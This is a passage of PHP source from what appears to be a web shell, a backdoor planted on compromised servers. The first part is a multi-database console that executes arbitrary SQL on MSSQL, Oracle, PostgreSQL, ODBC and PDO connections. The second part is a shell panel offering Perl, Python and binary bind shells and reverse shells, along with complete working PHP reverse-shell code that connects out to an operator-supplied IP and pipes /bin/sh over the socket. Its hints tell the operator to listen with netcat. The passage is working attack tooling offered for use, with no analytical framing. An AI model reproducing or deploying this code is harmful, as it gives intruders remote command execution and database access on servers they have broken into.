687.         } elseif (isset($_REQUEST['mssqlcon']) && ($con = mssql_connect($hostandport, $sqluser, $sqlpass))) {
688.             if (isset($_REQUEST['sqlcode'])) {
689.                 $sqls = ss($_REQUEST['sqlcode']);
690.                 $querys = explode(";", $sqls);
691.                 foreach ($querys as $query) {
692.                     if (trim($query) != "") {
693.                         $hasil = mssql_query($query);
694.                         if ($hasil) {
695.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
696. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
697. <table class=\"explore\" style=\"width:99%;\"><tr>";
698.                             for ($i = 0; $i < mssql_num_fields($hasil); $i++)
699.                                 $q_result .= "<th>" . htmlspecialchars(mssql_field_name($hasil, $i)) . "</th>"; $q_result .= "</tr>";
700.                             while ($rows = mssql_fetch_array($hasil)) {
701.                                 $q_result .= "<tr>";
702.                                 for ($j = 0; $j < mssql_num_fields($hasil); $j++) {
703.                                     if ($rows[$j] == "")
704.                                         $dataz = " "; else
705.                                         $dataz = $rows[$j]; $q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
706.                                 } $q_result .= "</tr>";
707.                             } $q_result .= "</table>";
708.                         } else
709.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
710. <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
711.                     }
712.                 }
713.             } else
714.                 $sqls = "EXEC sp_databases;"; $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
715. <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" />
716. <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" />
717. <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" />
718. <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" />
719. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
720. <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>
721. <p><input type=\"submit\" name=\"mssqlcon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
722. &nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
723. </form>";
724.             $s_result .= "<div>" . $q_result . "</div>";
725.             if ($con)
726.                 mssql_close($con);
727.         } elseif (isset($_REQUEST['oraclecon']) && ($con = oci_connect($sqluser, $sqlpass, $hostandport))) {
728.             if (isset($_REQUEST['sqlcode'])) {
729.                 $sqls = ss($_REQUEST['sqlcode']);
730.                 $querys = explode(";", $sqls);
731.                 foreach ($querys as $query) {
732.                     if (trim($query) != "") {
733.                         $st = oci_parse($con, $query);
734.                         if (oci_execute($st)) {
735.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
736. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
737. <table class=\"explore\" style=\"width:99%;\"><tr>";
738.                             for ($i = 1; $i <= oci_num_fields($st); $i++)
739.                                 $q_result .= "<th>" . htmlspecialchars(oci_field_name($st, $i)) . "</th>"; $q_result .= "</tr>";
740.                             while ($rows = oci_fetch_array($st)) {
741.                                 $q_result .= "<tr>";
742.                                 for ($j = 0; $j < oci_num_fields($st); $j++) {
743.                                     if ($rows[$j] == "")
744.                                         $dataz = " "; else
745.                                         $dataz = $rows[$j]; $q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
746.                                 } $q_result .= "</tr>";
747.                             } $q_result .= "</table>";
748.                         } else
749.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
750. <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
751.                     }
752.                 }
753.             } else
754.                 $sqls = "SELECT * FROM user_tablespaces;"; $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
755. <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" />
756. <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" />
757. <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" />
758. <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" />
759. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
760. <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>
761. <p><input type=\"submit\" name=\"oraclecon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
762. &nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
763. </form>";
764.             $s_result .= "<div>" . $q_result . "</div>";
765.             if ($con)
766.                 oci_close($con);
767.         } elseif (isset($_REQUEST['pgsqlcon']) && ($con = pg_connect("host=$sqlhost user=$sqluser password=$sqlpass port=$sqlport"))) {
768.             if (isset($_REQUEST['sqlcode'])) {
769.                 $sqls = ss($_REQUEST['sqlcode']);
770.                 $querys = explode(";", $sqls);
771.                 foreach ($querys as $query) {
772.                     if (trim($query) != "") {
773.                         $hasil = pg_query($query);
774.                         if ($hasil) {
775.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
776. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
777. <table class=\"explore\" style=\"width:99%;\"><tr>";
778.                             for ($i = 0; $i < pg_num_fields($hasil); $i++)
779.                                 $q_result .= "<th>" . htmlspecialchars(pg_field_name($hasil, $i)) . "</th>"; $q_result .= "</tr>";
780.                             while ($rows = pg_fetch_array($hasil)) {
781.                                 $q_result .= "<tr>";
782.                                 for ($j = 0; $j < pg_num_fields($hasil); $j++) {
783.                                     if ($rows[$j] == "")
784.                                         $dataz = " "; else
785.                                         $dataz = $rows[$j]; $q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
786.                                 } $q_result .= "</tr>";
787.                             } $q_result .= "</table>";
788.                         } else
789.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
790. <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
791.                     }
792.                 }
793.             }
794.         } elseif (isset($_REQUEST['odbccon']) && ($con = odbc_connect($odbcdsn, $odbcuser, $odbcpass))) {
795.             if (isset($_REQUEST['sqlcode'])) {
796.                 $sqls = ss($_REQUEST['sqlcode']);
797.                 $querys = explode(";", $sqls);
798.                 foreach ($querys as $query) {
799.                     if (trim($query) != "") {
800.                         $hasil = odbc_exec($con, $query);
801.                         if ($hasil) {
802.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
803. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
804. <table class=\"explore\" style=\"width:99%;\"><tr>";
805.                             for ($i = 1; $i <= odbc_num_fields($hasil); $i++)
806.                                 $q_result .= "<th>" . htmlspecialchars(odbc_field_name($hasil, $i)) . "</th>"; $q_result .= "</tr>";
807.                             while ($rows = odbc_fetch_array($hasil)) {
808.                                 $q_result .= "<tr>";
809.                                 foreach ($rows as $r) {
810.                                     if ($r == "")
811.                                         $dataz = " "; else
812.                                         $dataz = $r; $q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
813.                                 } $q_result .= "</tr>";
814.                             } $q_result .= "</table>";
815.                         } else
816.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
817. <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
818.                     }
819.                 }
820.             } else
821.                 $sqls = ""; $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
822. <input type=\"hidden\" name=\"odbcdsn\" value=\"" . $odbcdsn . "\" />
823. <input type=\"hidden\" name=\"odbcuser\" value=\"" . $odbcuser . "\" />
824. <input type=\"hidden\" name=\"odbcpass\" value=\"" . $odbcpass . "\" />
825. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
826. <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>
827. <p><input type=\"submit\" name=\"odbccon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
828. &nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
829. </form>";
830.             $s_result .= "<div>" . $q_result . "</div>";
831.             if ($con)
832.                 odbc_close($con);
833.         } else {
834.             if (isset($_REQUEST['pdocon'])) {
835.                 try {
836.                     $mypdo = new PDO($pdodsn, $pdouser, $pdopass);
837.                     if (isset($_REQUEST['sqlcode'])) {
838.                         $sqls = ss($_REQUEST['sqlcode']);
839.                         $querys = explode(";", $sqls);
840.                         foreach ($querys as $query) {
841.                             if (trim($query) != "") {
842.                                 if ($hasil = $mypdo->query($query)) {
843.                                     $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
844. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
845. <table class=\"explore\" style=\"width:99%;\"><tr>";
846.                                     $r = $hasil->fetch(PDO::FETCH_ASSOC);
847.                                     $savefirstrow = array();
848.                                     foreach ($r as $fn => $fv) {
849.                                         $q_result .= "<th>" . htmlspecialchars($fn) . "</th>";
850.                                         $savefirstrow[] = $fv;
851.                                     } $q_result .= "</tr><tr>";
852.                                     foreach ($savefirstrow as $fv) {
853.                                         $q_result .= "<td>" . htmlspecialchars($fv) . "</td>";
854.                                     } $q_result .= "</tr>";
855.                                     while ($rows = $hasil->fetch(PDO::FETCH_ASSOC)) {
856.                                         $q_result .= "<tr>";
857.                                         foreach ($rows as $r) {
858.                                             if ($r == "")
859.                                                 $dataz = " "; else
860.                                                 $dataz = $r; $q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
861.                                         } $q_result .= "</tr>";
862.                                     } $q_result .= "</table>";
863.                                 } else {
864.                                     $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
865. <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
866.                                 } $q_result .= "</table>";
867.                             }
868.                         }
869.                     } else
870.                         $sqls = ""; $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
871. <input type=\"hidden\" name=\"pdodsn\" value=\"" . $pdodsn . "\" />
872. <input type=\"hidden\" name=\"pdouser\" value=\"" . $pdouser . "\" />
873. <input type=\"hidden\" name=\"pdopass\" value=\"" . $pdopass . "\" />
874. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
875. <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>
876. <p><input type=\"submit\" name=\"pdocon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
877. &nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
878. </form>";
879.                     $s_result .= "<div>" . $q_result . "</div>";
880.                 } catch (PDOException $uck) {
881.                     die();
882.                 }
883.             } else {
884.                 $s_result .= "<div class=\"mybox\"><h2>connect to MySQL</h2>
885. <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
886. <table class=\"myboxtbl\">
887. <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost1\" value=\"" . $sqlhost1 . "\" /></td></tr>
888. <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser1\" value=\"" . $sqluser1 . "\" /></td></tr>
889. <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass1\" value=\"\" /></td></tr>
890. <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport1\" value=\"" . $sqlport1 . "\" /></td></tr>
891. </table>
892. <input type=\"submit\" name=\"mysqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
893. </form>
894. </div>";
895.                 $s_result .= "<div class=\"mybox\"><h2>connect to MsSQL</h2>
896. <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
897. <table class=\"myboxtbl\">
898. <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost2\" value=\"" . $sqlhost2 . "\" /></td></tr>
899. <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser2\" value=\"" . $sqluser2 . "\" /></td></tr>
900. <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass2\" value=\"\" /></td></tr>
901. <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport2\" value=\"" . $sqlport2 . "\" /></td></tr>
902. </table>
903. <input type=\"submit\" name=\"mssqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
904. </form>
905. </div>";
906.                 $s_result .= "<div class=\"mybox\"><h2>connect to PostgreSQL</h2>
907. <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
908. <table class=\"myboxtbl\">
909. <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost3\" value=\"" . $sqlhost3 . "\" /></td></tr>
910. <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser3\" value=\"" . $sqluser3 . "\" /></td></tr>
911. <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass3\" value=\"\" /></td></tr>
912. <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport3\" value=\"" . $sqlport3 . "\" /></td></tr>
913. </table>
914. <input type=\"submit\" name=\"pgsqlcon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
915. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
916. </form>
917. </div>";
918.                 $s_result .= "<div class=\"mybox\"><h2>connect to Oracle</h2>
919. <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
920. <table class=\"myboxtbl\">
921. <tr><td style=\"width:120px;\">Host</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlhost4\" value=\"" . $sqlhost4 . "\" /></td></tr>
922. <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqluser4\" value=\"" . $sqluser4 . "\" /></td></tr>
923. <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"sqlpass4\" value=\"\" /></td></tr>
924. <tr><td>Port (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport4\" value=\"" . $sqlport4 . "\" /></td></tr>
925. </table>
926. <input type=\"submit\" name=\"oraclecon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
927. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
928. </form>
929. </div>";
930.                 $s_result .= "<div class=\"mybox\"><h2>connect using ODBC</h2>
931. <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
932. <table class=\"myboxtbl\">
933. <tr><td style=\"width:120px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcdsn\" value=\"" . $odbcdsn . "\" /></td></tr>
934. <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"odbcuser\" value=\"" . $odbcuser . "\" /></td></tr>
935. <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"odbcpass\" value=\"\" /></td></tr>
936. </table>
937. <input type=\"submit\" name=\"odbccon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
938. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
939. </form>
940. </div>";
941.                 $s_result .= "<div class=\"mybox\"><h2>connect using PDO</h2>
942. <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\" />
943. <table class=\"myboxtbl\">
944. <tr><td style=\"width:120px;\">DSN / Connection String</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdodsn\" value=\"" . $pdodsn . "\" /></td></tr>
945. <tr><td>Username</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"pdouser\" value=\"" . $pdouser . "\" /></td></tr>
946. <tr><td>Password</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"password\" name=\"pdopass\" value=\"\" /></td></tr>
947. </table>
948. <input type=\"submit\" name=\"pdocon\" class=\"inputzbut\" value=\"Connect !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
949. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
950. </form>
951. </div>";
952.             }
953.         }
954.     } elseif (isset($_REQUEST['rs'])) {
955.         $rshost = $s_server_ip;
956.         $rstarget = "";
957.         $d = $pwd;
958.         if (isset($_REQUEST['d']))
959.             $d = ss($_REQUEST['d']); $rsport = "13123";
960.         $rspesan = "Press &#39; Go ! &#39; button and run &#39; nc <i>server_ip</i> <i>port</i> &#39; on your computer";
961.         $rspesanb = "Run &#39; nc -l -v -p <i>port</i> &#39; on your computer and press &#39; Go ! &#39; button";
962.         $rsport1 = $rsport;
963.         $rsport2 = $rsport;
964.         $rsport3 = $rsport;
965.         if (isset($_REQUEST['xbind_pl'])) {
966.             if (isset($_REQUEST['sqlport1']))
967.                 $rsport1 = ss($_REQUEST['sqlport1']); $rstarget = $rsport1;
968.             $rsres = rs($s_win, cp($d), "xbind_pl", $xbind_pl, $rstarget);
969.             $s_result .= $rsres;
970.         } if (isset($_REQUEST['xbind_py'])) {
971.             if (isset($_REQUEST['sqlport2']))
972.                 $rsport2 = ss($_REQUEST['sqlport2']); $rstarget = $rsport2;
973.             $rsres = rs($s_win, cp($d), "xbind_py", $xmulti_py, $rstarget);
974.             $s_result .= $rsres;
975.         } if (isset($_REQUEST['xbind_bin'])) {
976.             if (isset($_REQUEST['sqlport3']))
977.                 $rsport3 = ss($_REQUEST['sqlport3']); $rstarget = $rsport3;
978.             if (!$s_win)
979.                 $rsres = rs($s_win, cp($d), "xbind_bin", $xbind_c, $rstarget); else
980.                 $rsres = rs($s_win, cp($d), "xbind_bin", $wmulti_c, $rstarget); $s_result .= $rsres;
981.         } $rsportb1 = $rsport;
982.         $rsportb2 = $rsport;
983.         $rsportb3 = $rsport;
984.         $rsportb4 = $rsport;
985.         $rstarget1 = $s_my_ip;
986.         $rstarget2 = $s_my_ip;
987.         $rstarget3 = $s_my_ip;
988.         $rstarget4 = $s_my_ip;
989.         if (isset($_REQUEST['xback_pl'])) {
990.             if (isset($_REQUEST['sqlportb1']))
991.                 $rsportb1 = ss($_REQUEST['sqlportb1']); if (isset($_REQUEST['rstarget1']))
992.                 $rstarget1 = ss($_REQUEST['rstarget1']); $rstarget = $rsportb1 . " " . $rstarget1;
993.             $rsres = rs($s_win, cp($d), "xback_pl", $xback_pl, $rstarget);
994.             $s_result .= $rsres;
995.         } if (isset($_REQUEST['xback_py'])) {
996.             if (isset($_REQUEST['sqlportb2']))
997.                 $rsportb2 = ss($_REQUEST['sqlportb2']); if (isset($_REQUEST['rstarget2']))
998.                 $rstarget2 = ss($_REQUEST['rstarget2']); $rstarget = $rsportb2 . " " . $rstarget2;
999.             $rsres = rs($s_win, cp($d), "xback_py", $xmulti_py, $rstarget);
1000.             $s_result .= $rsres;
1001.         } if (isset($_REQUEST['xback_bin'])) {
1002.             if (isset($_REQUEST['sqlportb3']))
1003.                 $rsportb3 = ss($_REQUEST['sqlportb3']); if (isset($_REQUEST['rstarget3']))
1004.                 $rstarget3 = ss($_REQUEST['rstarget3']); $rstarget = $rsportb3 . " " . $rstarget3;
1005.             if (!$s_win)
1006.                 $rsres = rs($s_win, cp($d), "xback_bin", $xback_c, $rstarget); else
1007.                 $rsres = rs($s_win, cp($d), "xback_bin", $wmulti_c, $rstarget); $s_result .= $rsres;
1008.         } if (isset($_REQUEST['xback_php'])) {
1009.             if (isset($_REQUEST['sqlportb4']))
1010.                 $rsportb4 = ss($_REQUEST['sqlportb4']); if (isset($_REQUEST['rstarget4']))
1011.                 $rstarget4 = ss($_REQUEST['rstarget4']); $ip = $rstarget4;
1012.             $port = $rsportb4;
1013.             $chunk_size = 1337;
1014.             $write_a = null;
1015.             $error_a = null;
1016.             $shell = '/bin/sh';
1017.             $daemon = 0;
1018.             $debug = 0;
1019.             if (function_exists('pcntl_fork')) {
1020.                 $pid = pcntl_fork();
1021.                 if ($pid == -1)
1022.                     exit(1); if ($pid)
1023.                     exit(0); if (posix_setsid() == -1)
1024.                     exit(1); $daemon = 1;
1025.             } umask(0);
1026.             $sock = fsockopen($ip, $port, $errno, $errstr, 30);
1027.             if (!$sock)
1028.                 exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
1029.             $process = proc_open($shell, $descriptorspec, $pipes);
1030.             if (!is_resource($process))
1031.                 exit(1); stream_set_blocking($pipes[0], 0);
1032.             stream_set_blocking($pipes[1], 0);
1033.             stream_set_blocking($pipes[2], 0);
1034.             stream_set_blocking($sock, 0);
1035.             while (1) {
1036.                 if (feof($sock))
1037.                     break; if (feof($pipes[1]))
1038.                     break; $read_a = array($sock, $pipes[1], $pipes[2]);
1039.                 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
1040.                 if (in_array($sock, $read_a)) {
1041.                     $input = fread($sock, $chunk_size);
1042.                     fwrite($pipes[0], $input);
1043.                 } if (in_array($pipes[1], $read_a)) {
1044.                     $input = fread($pipes[1], $chunk_size);
1045.                     fwrite($sock, $input);
1046.                 } if (in_array($pipes[2], $read_a)) {
1047.                     $input = fread($pipes[2], $chunk_size);
1048.                     fwrite($sock, $input);
1049.                 }
1050.             } fclose($sock);
1051.             fclose($pipes[0]);
1052.             fclose($pipes[1]);
1053.             fclose($pipes[2]);
1054.             proc_close($process);
1055.             $rsres = " ";
1056.             $s_result .= $rsres;
1057.         } $s_result .= "<div class=\"mybox\"><h2>Bind shell ( perl )</h2>
1058. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1059. <table class=\"myboxtbl\">
1060. <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost1\" value=\"" . $rshost . "\" /></td></tr>
1061. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport1\" value=\"" . $rsport1 . "\" /></td></tr>
1062. </table>
1063. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1064. &nbsp;&nbsp;<span id=\"rs1\">" . $rspesan . "</span>
1065. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
1066. </form>
1067. </div>";
1068.         $s_result .= "<div class=\"mybox\"><h2>Bind shell ( python )</h2>
1069. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1070. <table class=\"myboxtbl\">
1071. <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost\" value=\"" . $rshost . "\" /></td></tr>
1072. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport2\" value=\"" . $rsport2 . "\" /></td></tr>
1073. </table>
1074. <input type=\"submit\" name=\"xbind_py\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1075. &nbsp;&nbsp;<span id=\"rs1\">" . $rspesan . "</span>
1076. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
1077. </form>
1078. </div>";
1079.         $s_result .= "<div class=\"mybox\"><h2>Bind shell ( bin )</h2>
1080. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1081. <table class=\"myboxtbl\">
1082. <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost\" value=\"" . $rshost . "\" /></td></tr>
1083. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport3\" value=\"" . $rsport3 . "\" /></td></tr>
1084. </table>
1085. <input type=\"submit\" name=\"xbind_bin\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1086. &nbsp;&nbsp;<span id=\"rs1\">" . $rspesan . "</span>
1087. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
1088. </form>
1089. </div>";
1090.         $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( perl )</h2>
1091. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1092. <table class=\"myboxtbl\">
1093. <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget1\" value=\"" . $rstarget1 . "\" /></td></tr>
1094. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb1\" value=\"" . $rsportb1 . "\" /></td></tr>
1095. </table>
1096. <input type=\"submit\" name=\"xback_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1097. &nbsp;&nbsp;<span id=\"rs1\">" . $rspesanb . "</span>
1098. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
1099. </form>
1100. </div>";
1101.         $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( python )</h2>
1102. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1103. <table class=\"myboxtbl\">
1104. <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget2\" value=\"" . $rstarget2 . "\" /></td></tr>
1105. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb2\" value=\"" . $rsportb2 . "\" /></td></tr>
1106. </table>
1107. <input type=\"submit\" name=\"xback_py\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1108. &nbsp;&nbsp;<span id=\"rs1\">" . $rspesanb . "</span>
1109. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
1110. </form>
1111. </div>";
1112.         $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( bin )</h2>
1113. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1114. <table class=\"myboxtbl\">
1115. <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget3\" value=\"" . $rstarget3 . "\" /></td></tr>
1116. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb3\" value=\"" . $rsportb3 . "\" /></td></tr>
1117. </table>
1118. <input type=\"submit\" name=\"xback_bin\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1119. &nbsp;&nbsp;<span id=\"rs1\">" . $rspesanb . "</span>
1120. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
1121. </form>
1122. </div>";
1123.         $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( php )</h2>
1124. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1125. <table class=\"myboxtbl\">
1126. <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget4\" value=\"" . $rstarget4 . "\" /></td></tr>
1127. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb4\" value=\"" . $rsportb4 . "\" /></td></tr>
1128. </table>
1129. <input type=\"submit\" name=\"xback_php\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1130. &nbsp;&nbsp;<span id=\"rs1\">" . $rspesanb . "</span>
1131. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
1132. </form>
1133. </div>";
1134.     } elseif (isset($_REQUEST['view'])) {
1135.         $f = ss($_REQUEST['view']);
1136.         if (isset($fnew) && (trim($fnew) != ""))
1137.             $f = $fnew; if (is_file($f)) {
1138.             if (!$s_win && $s_posix) {
1139.                 $name = posix_getpwuid(fileowner($f));
1140.                 $group = posix_getgrgid(filegroup($f));
1141.                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
1142.             } else {
1143.                 $owner = $s_user;
1144.             } $filn = basename($f);
1145.             $s_result .= "<table class=\"viewfile\" style=\"width:100%;\">
